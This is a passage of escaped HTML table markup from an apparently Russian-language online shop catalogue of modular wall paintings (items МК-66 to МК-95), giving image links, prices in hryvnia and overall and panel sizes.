style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-95</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">330грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х60</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х47, 25х50, 25х40, 25х50</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х70, 25х55, 25х20</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-90.png\" alt=\"мк 90\" width=\"260\" height=\"169\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-91.png\" alt=\"мк 91\" width=\"254\" height=\"164\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-92.png\" alt=\"мк 92\" width=\"240\" height=\"146\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-90</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-91</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-92</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х75</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х65, 30х80, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х35, 30х75, 30х65, 30х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-87.png\" alt=\"мк 87\" width=\"251\" height=\"163\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-88.png\" alt=\"мк 88\" width=\"253\" height=\"144\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-89.png\" alt=\"мк 89\" width=\"234\" height=\"164\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-87</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-88</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-89</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;143х80</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х70, 30х55, 30х40, 30х55</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;143х80см, 30х30, 30х80, 30х65, 45х30</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-84.png\" alt=\"мк 84\" width=\"251\" height=\"162\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-85.png\" alt=\"мк 85\" width=\"251\" height=\"155\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-86.png\" alt=\"мк 86\" width=\"244\" height=\"159\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-84</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-85</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-86</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-81.png\" alt=\"мк 81\" width=\"243\" height=\"156\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-82.png\" alt=\"мк 82\" width=\"246\" height=\"159\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-83.png\" alt=\"мк 83\" width=\"227\" height=\"147\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-81</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-82</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-83</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х80</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х80, 30х65, 30х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-78.png\" alt=\"мк 78\" width=\"255\" height=\"145\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-79.png\" alt=\"мк 79\" width=\"244\" height=\"144\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-80.png\" alt=\"мк 80\" width=\"236\" height=\"134\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-78</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-79</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-80</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">410грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х67</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х45, 30х70, 30х55, 30х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х40, 30х70, 30х60, 30х50</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х40, 30х70, 30х60, 30х50</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-75.png\" alt=\"мк 75\" width=\"244\" height=\"127\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-76.png\" alt=\"мк 76\" width=\"229\" height=\"131\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-77.png\" alt=\"мк 77\" width=\"229\" height=\"132\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-75</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-76</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-77</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х67</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х40, 30х55, 30х55, 30х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х35, 30х55, 30х70, 30х30</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х20, 30х55, 30х70, 30х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-72.jpg\" alt=\"мк 72\" width=\"248\" height=\"141\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-73.png\" alt=\"мк 73\" width=\"235\" height=\"137\" />&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-74.png\" alt=\"мк 74\" width=\"229\" height=\"131\" />&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-72</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-73</span></strong>&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-74</span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong>&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">370грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;130х70&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х70, 30х55, 30х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х70, 30х55, 30х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;30х30, 30х70, 30х55, 30х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-69.jpg\" alt=\"мк 69\" width=\"230\" height=\"140\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-70.jpg\" alt=\"мк 70\" width=\"230\" height=\"141\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-71.jpg\" alt=\"мк 71\" width=\"230\" height=\"140\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-69</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-70</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-71</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х35, 20х35, 20х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 20х35&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-66.jpg\" alt=\"мк 66\" width=\"230\" height=\"139\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-67.jpg\" alt=\"мк 67\" width=\"230\" height=\"139\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-68.jpg\" alt=\"мк 68\" width=\"200\" height=\"166\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-66</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-67</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-68</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;<strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">195грн</span></em></span></strong>&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;60х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х35&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х50</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;20х35, 20х35, 20х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х35, 20х35, 